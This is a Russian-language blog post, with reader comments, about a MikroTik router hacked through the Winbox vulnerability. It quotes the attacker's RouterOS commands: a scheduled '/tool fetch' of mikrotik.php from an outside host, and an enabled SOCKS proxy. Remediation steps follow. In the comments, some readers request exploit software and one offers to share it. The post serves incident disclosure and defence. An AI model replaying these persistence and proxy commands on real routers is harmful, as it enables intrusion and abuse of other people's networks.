Mikrotik ВЗЛОМАН, закрывайте winbox

Интернет

Внешний айпишник? Открыт Winbox? Стандартный порт 8291?

Взломали микротик очередной кашмар

В логах увидел

fetch: file 'mikrotik.php' downloaded

ВЗЛОМАН!



Очередной раз через уязвимость winbox на одной из последних прошивках 6.41.3 якобы безопасных был взломан микротик на раз-два!
Суть проблемы — вход злоумышленника через winbox с ip 95.154.216.160 абсолютно без проблем, в моём случае 2 неудачных попытки входа и 3-й успешный вход под второй учёткой со сложным паролем нигде не засвеченным.
Под этим логином не входили никогда, создана учётка про запас на случай потери основного пароля.

Далее после входа злоумышленник на микротике:

1. Создаёт скрипт script1_
/tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http

2. Создаёт в планировщике задание каждые 30 секунд выполнять скрипт script1_
3. Включает IP-> Socks
/ip socks> print
enabled: yes
port: 4145
connection-idle-timeout: 2m
max-connections: 200

Самое интересное то, что файл mikrotik.php пустой, либо это значит что это только предупреждение об уязвимости, либо всётаки конфиг ушёл в английское королевство.

Пока непонятно как такое могло быть?!

Что делать ели Ваш микротик взломан таким образом?

  • Надо изначально было не давать доступ к winbox из внешней сети, разрешить только с определённых айпи. +отключить webfig и прочие сервисы
  • Удалить скрипт и задание планировщика.
  • Выключить носки) Ip->Socks
  • Менять пароли
  • Шиться новой прошивкой, но не факт что она уже есть с фиксом * 6.42.6 (Current) mikrotik.com/download
* — Как заявил представитель Микротик уязвимость закрыта в 6.42.6 но требуется менять пароли!

It is a known fact that hacker:

1) Did scan Internet for devices with open Winbox port;
2) Download usernames and passwords;
3) Used access credentials in order to log into device as a normal user.

If router was upgraded, then it can not be hacked in such way any more. However, hacker still can access router as a normal user since he knows the username and password.


Если у кого есть замечания, дополнения или комментарии оставляйте их внизу страницы.
Регистрироваться необязательно.


Информация об IP адресе 95.154.216.160
inetnum: 95.154.216.128 — 95.154.216.255
netname: RSTS_HARDWARE_LIMITED
descr: RSTS HARDWARE LIMITED
country: GB
admin-c: MI4535-RIPE
tech-c: MI4535-RIPE
status: ASSIGNED PA
mnt-by: RAPIDSWITCH-MNT
created: 2017-09-08T15: 50: 03Z
last-modified: 2017-09-08T15: 50: 03Z
source: RIPE

person: Mandoca Ionut
address: RSTS HARDWARE LIMITED
address: 352-356 Battersea Park Road
address: London
address: SW11 3BY
address: United Kingdom
phone: +442071014169
nic-hdl: MI4535-RIPE
mnt-by: RAPIDSWITCH-MNT
created: 2017-09-08T15: 46: 59Z
last-modified: 2017-10-31T00: 04: 00Z
source: RIPE # Filtered

% Information related to '95.154.192.0/18AS20860'

route: 95.154.192.0/18
descr: Iomart Hosting Ltd
origin: AS20860
mnt-by: RAPIDSWITCH-MNT
mnt-routes: GB10488-RIPE-MNT
created: 2012-02-21T08: 53: 24Z
last-modified: 2012-02-21T08: 53: 24Z
source: RIPE

Помогла эта статья? 
Отблагодарить можно  , ссылка)
https://money.yandex.ru/to/41001106083184

50 комментариев

avatar
Ip меняется
tool fetch address=95.154.216.165 port=2008 src-path=/mikrotik.php mode=http
avatar
А у меня вот так:

/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Ясно что подсеть одна и английская королева нам мстит...
avatar
Самое странное что файл mikrotik.php пустой, адрес меняется, порт остаётся.
Очень смахивает на атаку этого злополучного диапазона айпи адресов.
Пароли то уже давно известны злоумышленнику, он мог бы так сильно и не палить себя…
avatar
Так же выключают фаервол и добавляют два правила в IP - Firewall - Raw на айпи 176.9.47.34
avatar
И меняют адреса днс серверов
avatar
хорошо что я попался тогда, когда хацкер оставлял фаервол и днс без изменений.
Вапще-то очень актуальная тема наньче этот взлом микротика. Уже 6 дней народ трясёт.
avatar
будем надеяться что фикс в последней прошивке действительно работает
avatar
У меня атаковали 5 серверов,небольших, проблема решается просто: создаем правило запрещающее весь остальной входящий трафик кроме разрешенного и фсё..(цепочка input_action drop)
avatar
Так я не понял. Микротиковцы! если прошивка стояла 6.42.3 то какого Х был взломан микротик?
Кто-то заранее собрал логпассы?

Что нового в 6.42.1 (2018-Apr-23 10:46)
:!) Winbox — исправлена ​​уязвимость, которая позволила получить доступ к незащищенному маршрутизатору;
avatar
Делает неактивным первое правило ip firewall filter
add action=drop chain=input comment=\ "\" dst-port=53 in-interface=wan protocol=udp
avatar
Более 200 000 маршрутизаторов MikroTik заражены майнинговой малварью
Сразу несколько ИБ-специалистов и компаний зафиксировали волну атак, направленную против маршрутизаторов MikroTik по всему миру. Первым на происходящее обратил внимание бразильский исследователь, известный под ником MalwareHunterBR.
Дело в том, что сначала атаки концентрировались на территории Бразилии, но затем распространились и на другие страны, что уже привлекло внимание Trustwave. По данным аналитиков компании, по информации на 1 августа 2018 года неизвестные злоумышленники скомпрометировали более 72 000 роутеров MikroTik в одной только Бразилии. На тот момент подобные атаки практиковала всего одна хакерская группа, так как специалистам удалось выявить только один Coinhive-ключ.
avatar
Слышал многое в последнее время про уязвимости микротика, читал как ломают, но нигде не могу и скачать найти софт или хакерское ПО с помощью которого можно взломать микротик.
Может кто подскажет?
avatar
А оно тебе надо!? Ну есть у меня данный эксплоит, который показывает логины и пассы в МТ. Недавно на 6.38 не сработал почемуто....
avatar
А можете дать побаловаться? мэйл n.mikro(дог)yanxex.ru
avatar
можно и мне прогу, зайти на микрот не могу из за удаленности, что бы не останавливать работу хотелось бы восстановить все мейл it(собака)ecln.ru
avatar
Стояла самая последняя прошивка 6,43 доступ к микротику потерян, так что уязивимость присутствует
avatar
6.42.6 - так же доступ потерян.
6.18 - успешно отбивает атаки.
avatar
Хренота творится с микротами! Пока всё не уляжется буду закрывать винбокс извне и менять порт.
avatar
Защищаться надо. Прописываем правила запретов от сканеров портов, прописываем порткнокинг многоуровневый, лучше всего белый список разрешенных адресов. Меняем порт, отключаем сервисы....
avatar
http://SPAMDELETED- раскрутить сайт цена - http://SPAMDELETED
avatar
Негодяй спамер, изыди в бан!
avatar
mikrotik не принимает пароль.
Что делать? Как войти ?
комментарий был удален
комментарий был удален
комментарий был удален
Автор топика запретил добавлять комментарии